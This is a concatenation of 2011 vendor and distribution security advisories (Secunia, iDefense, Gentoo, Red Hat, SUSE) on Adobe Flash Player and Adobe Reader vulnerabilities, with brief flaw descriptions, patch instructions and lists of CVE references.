* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45583
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Flash Player,
which can be exploited by malicious people to disclose sensitive
information and compromise a user's system.
7) An unspecified error can be exploited to disclose certain
information from another domain.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor
The vendor credits:
2) Yang Dingning, NCNIPC, Graduate University of Chinese Academy of
Sciences
3) Wushi, Team 509 via iDefense Labs
4, 11) Vitaliy Toropov via iDefense Labs
5) Alexander Zaitsev, Positive Technologies
6, 8) An anonymous person via ZDI
7) Brandon Hardy
9) Bo Qu, Palo Alto Networks
10) Bo Qu, Palo Alto Networks and Honggang Ren, FortiGuard Labs
12) Marc Schoenefeld (Dr. rer. nat.), Red Hat Security Response Team
13) Honggang Ren, FortiGuard Labs
ORIGINAL ADVISORY:
Adobe (APSB11-21):
http://www.adobe.com/support/security/bulletins/apsb11-21.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. iDefense Security Advisory 08.09.11
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 09, 2011
I. For more
information, please visit following website:
http://www.adobe.com/products/flashplayer/
II.
During the allocation of an array within a certain internal ActionScript
function, a size calculation may cause an integer value to overflow.
This condition may lead to the bounds of an undersized array being
overflown during a memory copy operation.
III. An attacker typically accomplishes this via
social engineering or injecting content into a compromised, trusted
site.
IV. VENDOR RESPONSE
Adobe has released a fix which addresses this issue. Information about
downloadable vendor updates can be found by clicking on the URLs shown.
http://www.adobe.com/support/security/bulletins/apsb11-21.html
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2011-2416 and CVE-2011-2136 to this issue. This is a candidate
for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
04/27/2011 Initial Vendor Notification
04/27/2011 Vendor Reply
08/09/2011 Coordinated Public Disclosure
IX. CREDIT
This vulnerability was reported to iDefense by Vitaliy Toropov.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2011 Verisign
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2130, CVE-2011-2134, CVE-2011-2135,
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138, CVE-2011-2139, CVE-2011-2140,
CVE-2011-2414, CVE-2011-2415, CVE-2011-2416, CVE-2011-2417, CVE-2011-2424,
CVE-2011-2425, CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430)
A flaw in Adobe Flash Player could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
VAR-201108-0146 | CVE-2011-2140 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2417, and CVE-2011-2425. Adobe Flash Player and Adobe AIR Any code that could be executed or service disruption ( Memory corruption ) There is a vulnerability that becomes a condition. This vulnerability CVE-2011-2135 , CVE-2011-2417 ,and CVE-2011-2425 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The flaw exists within the sequenceParameterSetNALUnit component. When handling the num_ref_frames_in_pic_order_cnt_cycle value the size is not validated and the process blindly copies user supplied data from offset_for_ref_frame into a fixed-length buffer on the stack. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SUSE Security Announcement
Package: flash-player
Announcement ID: SUSE-SA:2011:033
Date: Wed, 10 Aug 2011 14:00:00 +0000
Affected Products: SUSE Linux Enterprise Desktop 11 SP1
SUSE Linux Enterprise Desktop 10 SP4
Vulnerability Type: remote code execution
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
SUSE Default Package: yes
Cross-References: CVE-2011-2130, CVE-2011-2134, CVE-2011-2135
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138
CVE-2011-2139, CVE-2011-2140, CVE-2011-2414
CVE-2011-2415, CVE-2011-2416, CVE-2011-2417
CVE-2011-2425
Content of This Advisory:
1) Security Vulnerability Resolved:
remote code execution
Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information
______________________________________________________________________________
1) Problem Description and Brief Discussion
Flash-Player was updated to version 10.3.188.5 to fix various buffer
and integer overflows:
- CVE-2011-2130: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2134: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2135: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2136: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2137: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2138: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2139: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2140: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2414: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2415: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2416: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2417: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2425: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Earlier flash-player versions can be exploited to execute arbitrary code
remotely with the privileges of the attacked user.
For more details see:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
2) Solution or Work-Around
none
3) Special Instructions and Notes
Pleease restart your browser.
4) Package Location and Checksums
The preferred method for installing security updates is to use the YaST
"Online Update" module or the "zypper" commandline tool. The package and
patch management stack will detect which updates are required and
automatically perform the necessary steps to verify and install them.
Alternatively, download the update packages for your distribution manually
and verify their integrity by the methods listed in Section 6 of this
announcement. Then install the packages using the command
rpm -Fhv <file.rpm>
to apply the update, replacing <file.rpm> with the filename of the
downloaded RPM package.
Our maintenance customers are notified individually. The packages are
offered for installation from the maintenance web:
SUSE Linux Enterprise Desktop 10 SP4
http://download.novell.com/patch/finder/?keywords=7c71e4aec6afd72e6b40f8cf2817e900
SUSE Linux Enterprise Desktop 11 SP1
http://download.novell.com/patch/finder/?keywords=377e091a105e9d540a2a90f09cff0a10
______________________________________________________________________________
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
______________________________________________________________________________
6) Authenticity Verification and Additional Information
- Announcement authenticity verification:
SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.
To verify the signature of the announcement, save it as text into a file
and run the command
gpg --verify <file>
replacing <file> with the name of the file where you saved the
announcement. The output for a valid signature looks like:
gpg: Signature made <DATE> using RSA key ID 3D25D3D9
gpg: Good signature from "SuSE Security Team <security@suse.de>"
where <DATE> is replaced by the date the document was signed.
If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command
gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc
- Package authenticity verification:
SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.
The internal rpm package signatures provide an easy way to verify the
authenticity of an RPM package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, replacing <file.rpm> with the
filename of the RPM package downloaded. The package is unmodified if it
contains a valid signature from build@suse.de with the key ID 9C800ACA.
This key is automatically imported into the RPM database (on
RPMv4-based distributions) and the gpg key ring of 'root' during
installation. You can also find it on the first installation CD and at
the end of this announcement.
- SUSE runs two security mailing lists to which any interested party may
subscribe:
opensuse-security@opensuse.org
- General Linux and SUSE security discussion.
All SUSE security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security+subscribe@opensuse.org>.
opensuse-security-announce@opensuse.org
- SUSE's announce-only mailing list.
Only SUSE's security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security-announce+subscribe@opensuse.org>.
The <security@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular, the
clear text signature should show proof of the authenticity of the text.
SUSE Linux Products GmbH provides no warranties of any kind whatsoever
with respect to the information contained in this security advisory.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
